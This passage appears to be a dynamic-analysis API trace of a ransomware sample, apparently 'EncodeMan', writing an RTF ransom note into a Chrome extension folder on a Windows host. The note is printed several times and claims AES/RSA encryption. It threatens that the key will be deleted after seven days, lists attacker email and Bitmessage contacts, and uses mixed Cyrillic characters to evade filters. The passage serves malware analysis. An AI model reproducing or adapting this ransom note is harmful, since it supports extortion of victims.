\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.356] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.356] CloseHandle (hObject=0x2e8) returned 1 [0289.356] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0289.356] GetLastError () returned 0x2 [0289.356] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 